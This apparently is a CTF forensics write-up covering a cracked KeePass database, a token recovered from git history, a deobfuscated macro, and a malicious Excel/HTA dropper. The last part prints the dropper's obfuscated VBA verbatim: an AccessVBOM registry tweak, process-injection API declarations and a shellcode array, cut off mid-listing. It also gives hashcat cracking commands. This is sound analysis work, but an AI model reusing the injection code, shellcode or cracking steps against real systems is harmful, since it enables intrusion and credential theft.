The output decoded from the last stream (Wireshark stream 25) is itself base64, and decoding it yields binary rather than text, so it looks like the attacker read a file and base64-encoded it: almost certainly pwdb.kdbx, the file visible in the directory listing. A .kdbx file is a KeePass database, i.e. passwords and other sensitive data stored as an encrypted database.
To open it I'll use [KeePass](https://keepass.info/).

The database needs a master password, but I can brute-force it with hashcat. First I convert pwdb.kdbx into a crackable hash with keepass2john:
```
keepass2john pwdb.kdbx > hash.txt
```
Note that keepass2john prefixes the line with the file name (`pwdb:`); strip that prefix from hash.txt before running hashcat, because mode 13400 expects the bare `$keepass$*...` string.
```bash
hashcat -m 13400 -a 0 hash.txt /mnt/c/Users/admin/Downloads/rockyou.txt --force
hashcat -m 13400 hash.txt --show
```
(`--show` only prints what is already in the potfile, so the cracking run has to finish before the second command displays the password.)

Now I have the master password of pwdb.kdbx: `chainsaw`. I'll open the database and see what it holds.
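Before spending GPU time on it, it is worth confirming that the blob really is a KeePass database and reading its header, since the rounds count, seeds and IV in that header are exactly the values keepass2john turns into the hash that hashcat cracks. The following parser is added here (my own code, not from the challenge or from KeePass); the embedded string is the first 296 base64 characters of the stream 25 output above, which cover the whole outer header, and the parser also handles the 4-byte field lengths of KDBX 4.

```python
"""Confirm that the blob exfiltrated in stream 25 is a KeePass database and parse its outer header."""
import base64
import struct
from typing import Dict

# First 296 base64 characters of the decoded stream above: exactly the 222-byte KDBX outer header.
# The encrypted payload that follows it is omitted here.
STREAM_HEAD = ("A9mimmf7S7UAAAMAAhAAMcHy5r9xQ1C+WAUhavxa/wMEAAEAAAAEIAAgTIbunS6JtNX/VevlHDzUvxqQTM6jhauJLJzoQAzH"
               "hQUgALelNeh212dFAk8g/D4NHbddj9cpKd577DClZe9KWsbmBggAcBcAAAAAAAAHEAARgpZ1dyCo08oR4fFwSDgCCCAA"
               "j9h7HUI3rx1HEr4pP+G3Pdjmr5zVuHV5p2g2a/WMvssJIABca5nQqrSglX6w+YiyGBjTfDG7gRH4PA2FElVuS/0cyAoE"
               "AAIAAAAABAANCg0K")

SIG1, SIG2 = 0x9AA2D903, 0xB54BFB67  # KDBX (KeePass 2.x) file signature, little-endian
FIELD_NAMES = {0: "EndOfHeader", 1: "Comment", 2: "CipherID", 3: "CompressionFlags",
               4: "MasterSeed", 5: "TransformSeed", 6: "TransformRounds", 7: "EncryptionIV",
               8: "ProtectedStreamKey", 9: "StreamStartBytes", 10: "InnerRandomStreamID",
               11: "KdfParameters", 12: "PublicCustomData"}
CIPHERS = {"31c1f2e6bf714350be5805216afc5aff": "AES-256-CBC",
           "d6038a2b8b6f4cb5a524339a31dbb59a": "ChaCha20"}


def is_kdbx(blob: bytes) -> bool:
    """True if the blob starts with the two KDBX signature words."""
    return len(blob) >= 8 and struct.unpack("<II", blob[:8]) == (SIG1, SIG2)


def parse_kdbx_header(blob: bytes) -> Dict[str, object]:
    """Walk the outer header fields (id, length, data) up to EndOfHeader and summarise them."""
    if not is_kdbx(blob):
        raise ValueError("KDBX signature not found; this is not a KeePass 2.x database")
    minor, major = struct.unpack_from("<HH", blob, 8)
    hdr_len = 5 if major >= 4 else 3  # KDBX 3.x: uint16 field length; KDBX 4: uint32
    fields: Dict[str, bytes] = {}
    off = 12
    while True:
        if off + hdr_len > len(blob):
            raise ValueError("header truncated before EndOfHeader")
        fid = blob[off]
        (size,) = struct.unpack_from("<I" if major >= 4 else "<H", blob, off + 1)
        off += hdr_len
        data = blob[off:off + size]
        if len(data) != size:
            raise ValueError(f"header truncated inside field {fid}")
        off += size
        fields[FIELD_NAMES.get(fid, f"Unknown{fid}")] = data
        if fid == 0:
            break
    info: Dict[str, object] = {"version": f"{major}.{minor}", "header_len": off, "fields": fields}
    if "CipherID" in fields:
        info["cipher"] = CIPHERS.get(fields["CipherID"].hex(), fields["CipherID"].hex())
    if "CompressionFlags" in fields:
        info["compression"] = struct.unpack("<I", fields["CompressionFlags"])[0]  # 1 = gzip
    if "TransformRounds" in fields:
        info["rounds"] = struct.unpack("<Q", fields["TransformRounds"])[0]  # AES-KDF iterations
    return info


if __name__ == "__main__":
    blob = base64.b64decode(STREAM_HEAD)
    info = parse_kdbx_header(blob)
    print(f"KDBX {info['version']}, cipher {info['cipher']}, compression {info['compression']}, "
          f"{info['rounds']} transform rounds, header {info['header_len']} bytes")
    for name, data in info["fields"].items():
        print(f"  {name:<20} {data.hex()}")
```

The rounds value (6000, KeePass's old default) is what makes the hash cheap to crack with a wordlist; the `$keepass$` line keepass2john emits is assembled from this rounds count, the MasterSeed, TransformSeed, EncryptionIV and StreamStartBytes fields plus the first block of ciphertext that follows the header. To rebuild the actual file, decode the complete base64 string from the stream and write all of it to pwdb.kdbx.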


# 3/ Illumination

These are the files after unzipping:

The task asks me to find a token, but it appears to have been deleted.

I'll recover it from the git history with the following commands. First, list the commits:
```
$ git log
```
```
commit 47241a47f62ada864ec74bd6dedc4d33f4374699
Author: SherlockSec <dan@lights.htb>
Date: Fri May 31 12:00:54 2019 +0100
Thanks to contributors, I removed the unique token as it was a security risk. Thanks for reporting responsibly!
```
That is the commit I need. `git show` prints its diff, which includes the removed token:
```
$ git show 47241a47f62ada864ec74bd6dedc4d33f4374699
```

Base64-decoding the removed token gives the flag.
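The same trick scales beyond one known commit: every line removed by any commit can be scanned for high-entropy strings and, where they are base64, decoded on the spot. The following script is my own addition (not part of the challenge); it reads `git log -p` output, and the diff embedded in it is a constructed sample with a made-up token, not the real one.

```python
"""Scan `git log -p` output for secrets removed by a commit, the pattern behind this task."""
import base64
import binascii
import math
import re
import sys
from typing import Dict, List, Optional

# Constructed sample in `git log -p` format (not the challenge's real commit or token);
# the token is the base64 of the string "sample-token".
SAMPLE_LOG = """\
commit 0000000000000000000000000000000000000000
Author: someone <someone@example.com>
Date:   Fri May 31 12:00:54 2019 +0100

    Remove the unique token

diff --git a/config.json b/config.json
--- a/config.json
+++ b/config.json
@@ -1,4 +1,4 @@
 {
-  "token": "c2FtcGxlLXRva2Vu",
+  "token": "REDACTED",
   "name": "lights"
 }
"""

# Runs of base64-alphabet characters long enough to be a credential rather than a word.
TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")


def shannon_entropy(s: str) -> float:
    """Bits per character: English words sit well under 4, random-looking tokens higher."""
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())


def try_base64(s: str) -> Optional[str]:
    """Decode if the candidate is valid base64 whose plaintext is printable text, else None."""
    try:
        raw = base64.b64decode(s + "=" * (-len(s) % 4), validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    return text if text.isprintable() else None


def scan_git_log(text: str, min_entropy: float = 3.0) -> List[Dict[str, str]]:
    """Report high-entropy strings on removed ('-') lines, with the commit and file they came from."""
    findings: List[Dict[str, str]] = []
    commit, current_file = "?", "?"
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            current_file = line[4:]
            if current_file.startswith("b/"):
                current_file = current_file[2:]
        elif line.startswith("-") and not line.startswith("---"):  # removed line, not a file header
            for cand in TOKEN_RE.findall(line[1:]):
                if shannon_entropy(cand) < min_entropy:
                    continue
                findings.append({"commit": commit, "file": current_file, "line": str(lineno),
                                 "token": cand, "decoded": try_base64(cand) or ""})
    return findings


if __name__ == "__main__":
    # On a real repository:  git log -p --all | python scan_removed_secrets.py -
    log = sys.stdin.read() if sys.argv[1:] == ["-"] else SAMPLE_LOG
    for f in scan_git_log(log):
        print(f"{f['commit'][:12]} {f['file']}:{f['line']} {f['token']} -> {f['decoded'] or '(not base64 text)'}")
```

`--all` matters: a token "removed" on one branch often survives on another or on a tag, and the scan only sees what the log covers.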

# 4/ emo

The task gives me a Word document containing macros.

As usual I use `olevba` to dump the macros, but this time the script is painfully long. Before deobfuscating it I'll upload the file to VirusTotal to see what is already known about it.

The malware runs one very long command; I'll look it up under the `Community` tab of the same page.
After some scrolling, this [link](https://www.joesandbox.com/analysis/844561/0/html) gives the full command:
```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```
Decoding the base64 gives a PowerShell script:

I tried PSDecode on it without success, so the only option left was reading it by hand.
The variable `FN5ggmsH` is the interesting one: a list of numbers that is converted to characters, then to bytes, and XORed with `0xdf`. I wrote a short Python script to reproduce what happens to `FN5ggmsH`:
```python=
# The values assigned to FN5ggmsH in the decoded PowerShell, copied as-is
num = (182, 187, 229, 146, 231, 177, 151, 149, 166)
num += (186, 141, 228, 182, 177, 171, 229, 236, 239, 239, 239, 228, 181, 182, 171, 229, 234, 239, 239, 228)
num += (185, 179, 190, 184, 229, 151, 139, 157, 164, 235, 177, 239, 171, 183, 236, 141, 128, 187, 235, 134, 128, 158, 177, 176, 139)
num += (183, 154, 173, 128, 175, 151, 238, 140, 183, 162, 228, 170, 173, 179, 229)
# Each value is XORed with the single-byte key 0xdf and turned back into a character
res = [chr(i ^ 0xDF) for i in num]
result_string = ''.join(res)
print(result_string)
```
The result contains the flag: the decoded string is a `;`-separated list of `key:value` pairs (`id`, `int`, `jit`, `flag`, `url`), and the flag sits in the `flag:` field.

# 5/ oBfsC4t10n

The task provides an Excel file that throws an error when opened. It is malicious, and the task asks me to work out how it operates.
Malicious Excel and Word files usually come down to macros; I covered macros in earlier write-ups, so I won't repeat the basics here.
The first step with samples like this is to turn off real-time protection so the file isn't quarantined (in an isolated analysis VM, never on a daily-use machine). This one is rated hard, so I'll work carefully and concentrate on the C2 and the IOCs.
I'll get an overview of the file with two commands:
```bash
$ ./pypy ~/Downloads/ViperMonkey-master/vipermonkey/vmonkey.py invoice-42369643.xlsm
$ olevba invoice-42369643.xlsm
```
Here is the output:


As the output shows, a file named LwTHLrGh.hta is executed once the workbook is opened. Apart from its odd name, I wanted to know what an .hta file actually is.
:::success
An .hta file (HTML Application) contains HTML, JavaScript and VBScript and can use Windows system features and APIs, which lets you build desktop-style applications without a browser. On Windows, .hta files run inside the "HTML Application Host", mshta.exe.
Because such an application runs outside the browser sandbox, it can reach system resources such as files, directories and Windows APIs. That flexibility is exactly why .hta files are also used as malware droppers, so .hta files from untrusted sources must be handled with care.
:::
Next I want the contents of LwTHLrGh.hta. I'll take the MD5 of the workbook and search for it on [any.run](https://any.run/), an online sandbox that lets me watch the malware's behaviour without detonating it on my own system.
```
$ md5sum invoice-42369643.xlsm
```
On the site, open Public tasks, paste the MD5 and pick the first result.

The Processes pane lists the notable processes: PID 1048 spawns PID 2188, and 2188 is the process that runs LwTHLrGh.hta, the file I flagged as suspicious at the start.

Registry changes shows the keys this file touches. The telling one is `AccessVBOM` under `HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Excel\Security`, which the HTA sets to 1 (the `' Weaken the target` step in the script) so that it is allowed to add a VBA module to a workbook programmatically.

Now the details. Modified files lists three files; I'll start with LwTHLrGh.hta, the one with the longest execution time.
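The listing below is hard to read because the HTA builds the VBA source as hundreds of `"…"&Chr(n)&"…"` fragments joined with `& _` line continuations, and the shellcode is a `myArray = Array(-35,-63,…)` literal of signed bytes. Here is a small tool I added for this write-up (not part of the sample or of olevba) that evaluates that concatenation and pulls the array out as raw bytes; its input is a constructed excerpt in the listing's doubled-quote form, with only the first five array values taken from the listing.

```python
"""Flatten the string-concatenation obfuscation in LwTHLrGh.hta and recover the shellcode bytes."""
import re

# Constructed excerpt in the same form as the olevba listing: the HTA is printed as a VBA string,
# so every quote inside it appears doubled. Only the first five array values come from the listing.
LISTING_EXCERPT = ('"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion Cre""&""ateStuff""&"" Lib ""'
                   '&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreateRe""&""moteThre""&""ad""'
                   '&Chr(34)&Chr(10)& _\n'
                   '"" myAr""&""ray ""&Chr(61)&"" Array""&Chr(40)&Chr(45)&""35""&Chr(44)&Chr(45)&""63""'
                   '&Chr(44)&Chr(45)&""65""&Chr(44)&""32""&Chr(44)&""86""&Chr(41)&Chr(10)')

# One token of the VBScript expression: a string literal ("" inside it is an escaped quote),
# a Chr(n) call, the & operator, a " _" line continuation, or whitespace.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)|(&)|(_[ \t]*\r?\n)|(\s+)')


def undouble(listing: str) -> str:
    """olevba prints the HTA as a VBA string literal, so "" in the listing is a single " in the HTA."""
    return listing.replace('""', '"')


def flatten(expr: str) -> str:
    """Evaluate a VBScript concatenation of literals and Chr() calls into the text it builds."""
    out, pos = [], 0
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            raise ValueError(f"unexpected token at offset {pos}: {expr[pos:pos + 20]!r}")
        literal, chr_code = m.group(1), m.group(2)
        if literal is not None:
            out.append(literal.replace('""', '"'))
        elif chr_code is not None:
            out.append(chr(int(chr_code)))
        # '&', line continuations and whitespace contribute nothing to the built string
        pos = m.end()
    return "".join(out)


def extract_shellcode(vba: str) -> bytes:
    """myArray = Array(-35, -63, ...) holds signed bytes; mask each to 0..255 for the raw payload."""
    m = re.search(r"Array\(\s*([-\d,\s]+?)\s*\)", vba)
    if not m:
        raise ValueError("no Array(...) literal found")
    values = [int(v) for v in m.group(1).split(",") if v.strip()]
    if any(v < -128 or v > 255 for v in values):
        raise ValueError("array element outside the byte range")
    return bytes(v & 0xFF for v in values)


if __name__ == "__main__":
    vba = flatten(undouble(LISTING_EXCERPT))
    print(vba)
    shellcode = extract_shellcode(vba)
    print(f"{len(shellcode)} bytes: {shellcode.hex()}")
    # For the real sample, write the bytes out and look at them in a disassembler or an emulator:
    # open("shellcode.bin", "wb").write(shellcode)
```

For the real file, pass the whole argument of `xlmodule.CodeModule.AddFromString` (from the start of `"Private ""&""Type PRO` to the end of the expression) through `undouble` and `flatten`; the result is the plain VBA module, in which the `CreateStuff`/`AllocStuff`/`WriteStuff`/`RunStuff` aliases read as `CreateRemoteThread`, `VirtualAllocEx`, `WriteProcessMemory` and `CreateProcessA`, i.e. classic process injection of the `myArray` bytes.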
```vb=
"<html><head><script language=""vbscript"">
Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule
Set objExcel = CreateObject(""Excel.Application"")
objExcel.Visible = False
Set WshShell = CreateObject(""Wscript.Shell"")
function RegExists(regKey)
on error resume next
WshShell.RegRead regKey
RegExists = (Err.number = 0)
end function
' Get the old AccessVBOM value
RegPath = ""HKEY_CURRENT_USER\Software\Microsoft\Office\"" & objExcel.Version & ""\Excel\Security\AccessVBOM""
if RegExists(RegPath) then
action = WshShell.RegRead(RegPath)
else
action = """"
end if
' Weaken the target
WshShell.RegWrite RegPath, 1, ""REG_DWORD""
' Run the macro
Set objWorkbook = objExcel.Workbooks.Add()
Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
xlmodule.CodeModule.AddFromString ""Private ""&""Type PRO""&""CESS_INF""&""ORMATION""&Chr(10)&"" hPro""&""cess As ""&""Long""&Chr(10)&"" hThr""&""ead As L""&""ong""&Chr(10)&"" dwPr""&""ocessId ""&""As Long""&Chr(10)&"" dwTh""&""readId A""&""s Long""&Chr(10)& _
""End Type""&Chr(10)&Chr(10)&""Private ""&""Type STA""&""RTUPINFO""&Chr(10)&"" cb A""&""s Long""&Chr(10)&"" lpRe""&""served A""&""s String""&Chr(10)&"" lpDe""&""sktop As""&"" String""&Chr(10)&"" lpTi""&""tle As S""&""tring""& _
Chr(10)&"" dwX ""&""As Long""&Chr(10)&"" dwY ""&""As Long""&Chr(10)&"" dwXS""&""ize As L""&""ong""&Chr(10)&"" dwYS""&""ize As L""&""ong""&Chr(10)&"" dwXC""&""ountChar""&""s As Lon""&""g""&Chr(10)&"" dwYC""&""ountChar""& _
""s As Lon""&""g""&Chr(10)&"" dwFi""&""llAttrib""&""ute As L""&""ong""&Chr(10)&"" dwFl""&""ags As L""&""ong""&Chr(10)&"" wSho""&""wWindow ""&""As Integ""&""er""&Chr(10)&"" cbRe""&""served2 ""&""As Integ""&""er""&Chr(10)&"" lpRe""& _
""served2 ""&""As Long""&Chr(10)&"" hStd""&""Input As""&"" Long""&Chr(10)&"" hStd""&""Output A""&""s Long""&Chr(10)&"" hStd""&""Error As""&"" Long""&Chr(10)&""End Type""&Chr(10)&Chr(10)&Chr(35)&""If VBA7 ""&""Then""&Chr(10)& _
"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion Cre""&""ateStuff""&"" Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreateRe""&""moteThre""&""ad""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)& _
"" ByVal l""&""pThreadA""&""ttribute""&""s As Lon""&""g""&Chr(44)&"" ByVal d""&""wStackSi""&""ze As Lo""&""ng""&Chr(44)&"" ByVal l""&""pStartAd""&""dress As""&"" LongPtr""&Chr(44)&"" lpParam""&""eter As ""&""Long""&Chr(44)&"" ByVal d""& _
""wCreatio""&""nFlags A""&""s Long""&Chr(44)&"" lpThrea""&""dID As L""&""ong""&Chr(41)&"" As Long""&""Ptr""&Chr(10)&"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion All""&""ocStuff ""&""Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""& _
Chr(34)&""VirtualA""&""llocEx""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)&"" ByVal l""&""pAddr As""&"" Long""&Chr(44)&"" ByVal l""&""Size As ""&""Long""&Chr(44)&"" ByVal f""&""lAllocat""&""ionType ""&""As Long""& _
Chr(44)&"" ByVal f""&""lProtect""&"" As Long""&Chr(41)&"" As Long""&""Ptr""&Chr(10)&"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion Wri""&""teStuff ""&""Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""WritePro""& _
""cessMemo""&""ry""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)&"" ByVal l""&""Dest As ""&""LongPtr""&Chr(44)&"" ByRef S""&""ource As""&"" Any""&Chr(44)&"" ByVal L""&""ength As""&"" Long""&Chr(44)&"" ByVal L""& _
""engthWro""&""te As Lo""&""ngPtr""&Chr(41)&"" As Long""&""Ptr""&Chr(10)&"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion Run""&""Stuff Li""&""b ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreatePr""&""ocessA""&Chr(34)& _
"" ""&Chr(40)&""ByVal lp""&""Applicat""&""ionName ""&""As Strin""&""g""&Chr(44)&"" ByVal l""&""pCommand""&""Line As ""&""String""&Chr(44)&"" lpProce""&""ssAttrib""&""utes As ""&""Any""&Chr(44)&"" lpThrea""&""dAttribu""&""tes As A""&""ny""& _
Chr(44)&"" ByVal b""&""InheritH""&""andles A""&""s Long""&Chr(44)&"" ByVal d""&""wCreatio""&""nFlags A""&""s Long""&Chr(44)&"" lpEnvir""&""onment A""&""s Any""&Chr(44)&"" ByVal l""&""pCurrent""&""Director""&""y As Str""&""ing""&Chr(44)& _
"" lpStart""&""upInfo A""&""s STARTU""&""PINFO""&Chr(44)&"" lpProce""&""ssInform""&""ation As""&"" PROCESS""&""_INFORMA""&""TION""&Chr(41)&"" As Long""&Chr(10)&Chr(35)&""Else""&Chr(10)&"" Priv""&""ate Decl""&""are Func""&""tion Cre""& _
""ateStuff""&"" Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreateRe""&""moteThre""&""ad""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)&"" ByVal l""&""pThreadA""&""ttribute""&""s As Lon""&""g""&Chr(44)& _
"" ByVal d""&""wStackSi""&""ze As Lo""&""ng""&Chr(44)&"" ByVal l""&""pStartAd""&""dress As""&"" Long""&Chr(44)&"" lpParam""&""eter As ""&""Long""&Chr(44)&"" ByVal d""&""wCreatio""&""nFlags A""&""s Long""&Chr(44)&"" lpThrea""&""dID As L""& _
""ong""&Chr(41)&"" As Long""&Chr(10)&"" Priv""&""ate Decl""&""are Func""&""tion All""&""ocStuff ""&""Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""VirtualA""&""llocEx""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""& _
""s Long""&Chr(44)&"" ByVal l""&""pAddr As""&"" Long""&Chr(44)&"" ByVal l""&""Size As ""&""Long""&Chr(44)&"" ByVal f""&""lAllocat""&""ionType ""&""As Long""&Chr(44)&"" ByVal f""&""lProtect""&"" As Long""&Chr(41)&"" As Long""&Chr(10)& _
"" Priv""&""ate Decl""&""are Func""&""tion Wri""&""teStuff ""&""Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""WritePro""&""cessMemo""&""ry""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)&"" ByVal l""& _
""Dest As ""&""Long""&Chr(44)&"" ByRef S""&""ource As""&"" Any""&Chr(44)&"" ByVal L""&""ength As""&"" Long""&Chr(44)&"" ByVal L""&""engthWro""&""te As Lo""&""ng""&Chr(41)&"" As Long""&Chr(10)&"" Priv""&""ate Decl""&""are Func""&""tion Run""& _
""Stuff Li""&""b ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreatePr""&""ocessA""&Chr(34)&"" ""&Chr(40)&""ByVal lp""&""Applicat""&""ionName ""&""As Strin""&""g""&Chr(44)&"" ByVal l""&""pCommand""&""Line As ""&""String""&Chr(44)& _
"" lpProce""&""ssAttrib""&""utes As ""&""Any""&Chr(44)&"" lpThrea""&""dAttribu""&""tes As A""&""ny""&Chr(44)&"" ByVal b""&""InheritH""&""andles A""&""s Long""&Chr(44)&"" ByVal d""&""wCreatio""&""nFlags A""&""s Long""&Chr(44)&"" lpEnvir""& _
""onment A""&""s Any""&Chr(44)&"" ByVal l""&""pCurrent""&""Driector""&""y As Str""&""ing""&Chr(44)&"" lpStart""&""upInfo A""&""s STARTU""&""PINFO""&Chr(44)&"" lpProce""&""ssInform""&""ation As""&"" PROCESS""&""_INFORMA""&""TION""&Chr(41)& _
"" As Long""&Chr(10)&Chr(35)&""End If""&Chr(10)&Chr(10)&""Sub Auto""&""_Open""&Chr(40)&Chr(41)&Chr(10)&"" Dim ""&""myByte A""&""s Long""&Chr(44)&"" myArray""&"" As Vari""&""ant""&Chr(44)&"" offset ""&""As Long""&Chr(10)&"" Dim ""& _
""pInfo As""&"" PROCESS""&""_INFORMA""&""TION""&Chr(10)&"" Dim ""&""sInfo As""&"" STARTUP""&""INFO""&Chr(10)&"" Dim ""&""sNull As""&"" String""&Chr(10)&"" Dim ""&""sProc As""&"" String""&Chr(10)&Chr(10)&Chr(35)&""If VBA7 ""& _
""Then""&Chr(10)&"" Dim ""&""rwxpage ""&""As LongP""&""tr""&Chr(44)&"" res As ""&""LongPtr""&Chr(10)&Chr(35)&""Else""&Chr(10)&"" Dim ""&""rwxpage ""&""As Long""&Chr(44)&"" res As ""&""Long""&Chr(10)&Chr(35)&""End If""&Chr(10)& _
"" myAr""&""ray ""&Chr(61)&"" Array""&Chr(40)&Chr(45)&""35""&Chr(44)&Chr(45)&""63""&Chr(44)&Chr(45)&""65""&Chr(44)&""32""&Chr(44)&""86""&Chr(44)&""66""&Chr(44)&""126""&Chr(44)&Chr(45)&""39""&Chr(44)&""116""&Chr(44)&""36""&Chr(44)& _
Chr(45)&""12""&Chr(44)&""91""&Chr(44)&""49""&Chr(44)&Chr(45)&""55""&Chr(44)&Chr(45)&""79""&Chr(44)&""98""&Chr(44)&""49""&Chr(44)&""123""&Chr(44)&""24""&Chr(44)&""3""&Chr(44)&""123""&Chr(44)&""24""&Chr(44)&Chr(45)&""125""&Chr(44)& _
Chr(45)&""61""&Chr(44)&""36""&Chr(44)&Chr(45)&""76""&Chr(44)&Chr(45)&""73""&Chr(44)&Chr(45)&""126""&Chr(44)&Chr(45)&""52""&Chr(44)&Chr(45)&""70""&Chr(44)&""56""&Chr(44)&""123""&Chr(44)&""12""&Chr(44)&Chr(45)&""37""&Chr(44)&Chr(45)& _
""79""&Chr(44)&Chr(45)&""98""&Chr(44)&""61""&Chr(44)&Chr(45)&""37""&Chr(44)&Chr(45)&""90""&Chr(44)&Chr(45)&""21""&Chr(44)&""109""&Chr(44)&Chr(45)&""21""&Chr(44)&Chr(45)&""83""&Chr(44)&Chr(45)&""66""&Chr(44)&Chr(45)&""127""&Chr(44)& _
Chr(45)&""128""&Chr(44)&Chr(45)&""32""&Chr(44)&""42""&Chr(44)&""18""&Chr(44)&Chr(45)&""28""&Chr(44)&""44""&Chr(44)&""92""&Chr(44)&Chr(45)&""109""&Chr(44)&""67""&Chr(44)&""11""&Chr(44)&""83""&Chr(44)&""36""&Chr(44)&Chr(45)&""1""&Chr(44)& _
""111""&Chr(44)&Chr(45)&""14""&Chr(44)&Chr(45)&""90""&Chr(44)&""2""&Chr(44)&Chr(45)&""68""&Chr(44)&Chr(45)&""44""&Chr(44)&Chr(45)&""105""&Chr(44)&Chr(45)&""52""&Chr(44)&Chr(45)&""79""&Chr(44)&""21""&Chr(44)&Chr(45)&""48""&Chr(44)& _
""49""&Chr(44)&""59""&Chr(44)&""71""&Chr(44)&Chr(45)&""119""&Chr(44)&""62""&Chr(44)&Chr(45)&""18""&Chr(44)&""120""&Chr(44)&Chr(45)&""66""&Chr(44)&""11""&Chr(44)&""51""&Chr(44)&Chr(45)&""14""&Chr(44)&Chr(45)&""116""&Chr(44)&Chr(45)& _
""102""&Chr(44)&""51""&Chr(44)&Chr(45)&""25""&Chr(44)&""68""&Chr(44)&Chr(45)&""100""&Chr(44)&""18""&Chr(44)&Chr(45)&""74""&Chr(44)&Chr(45)&""33""&Chr(44)&Chr(45)&""57""&Chr(44)&Chr(45)&""76""&Chr(44)&""56""&Chr(44)&""12""&Chr(44)& _
""124""&Chr(44)&Chr(45)&""3""&Chr(44)&""34""&Chr(44)&""81""&Chr(44)&Chr(45)&""71""&Chr(44)&Chr(45)&""73""&Chr(44)&Chr(45)&""39""&Chr(44)&Chr(45)&""95""&Chr(44)&""53""&Chr(44)&""70""&Chr(44)&""8""&Chr(44)&Chr(45)&""8""&Chr(44)&Chr(45)& _
""74""&Chr(44)&Chr(45)&""27""&Chr(44)&""117""&Chr(44)&""53""&Chr(44)&""69""&Chr(44)&Chr(45)&""9""&Chr(44)&Chr(45)&""78""&Chr(44)&Chr(45)&""15""&Chr(44)&Chr(45)&""74""&Chr(44)&Chr(45)&""126""&Chr(44)&Chr(45)&""54""&Chr(44)&""2""& _
Chr(44)&""74""&Chr(44)&Chr(45)&""107""&Chr(44)&""8""&Chr(44)&""121""&Chr(44)&Chr(45)&""112""&Chr(44)&""16""&Chr(44)&Chr(45)&""117""&Chr(44)&Chr(45)&""39""&Chr(44)&""83""&Chr(44)&Chr(45)&""126""&Chr(44)&""119""&Chr(44)&Chr(45)& _
""40""&Chr(44)&Chr(45)&""80""&Chr(44)&""85""&Chr(44)&Chr(45)&""13""&Chr(44)&Chr(45)&""42""&Chr(44)&""125""&Chr(44)&""17""&Chr(44)&""91""&Chr(44)&Chr(45)&""6""&Chr(44)&Chr(45)&""128""&Chr(44)&Chr(45)&""10""&Chr(44)&Chr(45)&""41""& _
Chr(44)&""6""&Chr(44)&""8""&Chr(44)&Chr(45)&""7""&Chr(44)&""55""&Chr(44)&Chr(45)&""113""&Chr(44)&""74""&Chr(44)&Chr(45)&""34""&Chr(44)&Chr(45)&""109""&Chr(44)&Chr(45)&""44""&Chr(44)&""9""&Chr(44)&""127""&Chr(44)&Chr(45)&""123""& _
Chr(44)&Chr(45)&""80""&Chr(44)&Chr(45)&""4""&Chr(44)&Chr(45)&""128""&Chr(44)&Chr(45)&""43""&Chr(44)&""27""&Chr(44)&Chr(45)&""96""&Chr(44)&""36""&Chr(44)&Chr(45)&""99""&Chr(44)&Chr(45)&""79""&Chr(44)&Chr(45)&""75""&Chr(44)&""84""& _
Chr(44)&Chr(45)&""4""&Chr(44)&Chr(45)&""35""&Chr(44)&""122""&Chr(44)&""85""&Chr(44)&Chr(45)&""1""&Chr(44)&""29""&Chr(44)&""21""&Chr(44)&Chr(45)&""18""&Chr(44)&Chr(45)&""116""&Chr(44)&""47""&Chr(44)&Chr(45)&""70""&Chr(44)&""68""& _
Chr(44)&""27""&Chr(44)&""3""&Chr(44)&""51""&Chr(44)&""67""&Chr(44)&Chr(45)&""36""&Chr(44)&""100""&Chr(44)&""110""&Chr(44)&""51""&Chr(44)&""114""&Chr(44)&Chr(45)&""101""&Chr(44)&Chr(45)&""111""&Chr(44)&""68""&Chr(44)&""90""&Chr(44)& _
""95""&Chr(44)&Chr(45)&""59""&Chr(44)&""20""&Chr(44)&Chr(45)&""12""&Chr(44)&""118""&Chr(44)&""102""&Chr(44)&Chr(45)&""1""&Chr(44)&""4""&Chr(44)&""119""&Chr(44)&Chr(45)&""77""&Chr(44)&""80""&Chr(44)&""85""&Chr(44)&Chr(45)&""41""&Chr(44)& _
""108""&Chr(44)&""17""&Chr(44)&""5""&Chr(44)&Chr(45)&""105""&Chr(44)&Chr(45)&""36""&Chr(44)&Chr(45)&""7""&Chr(44)&""79""&Chr(44)&""24""&Chr(44)&""2""&Chr(44)&""25""&Chr(44)&""112""&Chr(44)&Chr(45)&""13""&Chr(44)&""43""&Chr(44)&""50""& _
